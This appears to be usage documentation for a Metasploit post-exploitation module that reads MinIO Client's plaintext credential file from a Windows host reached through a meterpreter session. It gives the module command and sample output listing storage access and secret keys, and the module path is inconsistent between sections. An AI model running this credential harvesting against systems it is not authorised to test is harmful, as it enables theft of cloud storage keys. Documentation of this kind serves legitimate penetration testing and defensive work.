cn-kali-team
43 lines
2.0 KiB
Markdown
43 lines
2.0 KiB
Markdown
## Vulnerable Application
|
|
[MinIO Client](https://dl.min.io/client/mc/release/)
|
|
The MinIO Client mc command line tool provides a modern alternative to UNIX commands like ls,
|
|
cat, cp, mirror, and diff with support for both filesystems and Amazon S3-compatible cloud storage services.
|
|
Its credential file is saved in the user's home directory in plaintext json.
|
|
## Installation Steps
|
|
|
|
1. Download the latest installer of MinIO Client (https://dl.min.io/client/mc/release/).
|
|
2. Run `mc alias set myminio https://play.min.io minioadmin minioadmin`.
|
|
3. Run `mc admin info myminio`,check for working.
|
|
|
|
## Verification Steps
|
|
|
|
1. Get a `meterpreter` session on a Windows host.
|
|
2. Do: `run post/multi/gather/minio_client`
|
|
3. If the configuration file is found in the system, it will be printed out
|
|
|
|
## Options
|
|
|
|
### CONFIG_PATH
|
|
|
|
Specifies the config file path for MinIO Client (eg. `C:\Users\FireEye\mc\config.json`)
|
|
|
|
## Scenarios
|
|
|
|
```
|
|
meterpreter > run post/windows/gather/credentials/minio_client CONFIG_PATH="C:\Users\FireEye\mc\config.json"
|
|
|
|
[*] Parsing file C:\Users\FireEye\mc\config.json
|
|
MinIO Client Key
|
|
================
|
|
|
|
name url accessKey secretKey api path
|
|
---- --- --------- --------- --- ----
|
|
gcs https://storage.googleapis.com YOUR-ACCESS-KEY-HERE YOUR-SECRET-KEY-HERE S3v2 dns
|
|
local http://localhost:9000 S3v4 auto
|
|
myminio https://play.min.io minioadmin minioadmin s3v4 auto
|
|
play https://play.min.io Q3AM3UQ867SPQQA43P2F zuf+tfteSlswRu7BJ86wekitnifILbZam1KYY3TG S3v4 auto
|
|
s3 https://s3.amazonaws.com YOUR-ACCESS-KEY-HERE YOUR-SECRET-KEY-HERE S3v4 dns
|
|
|
|
[+] Session info stored in: /home/kali-team/.msf4/loot/20221206193240_default_172.16.153.128_host.minio_756923.txt
|
|
```
|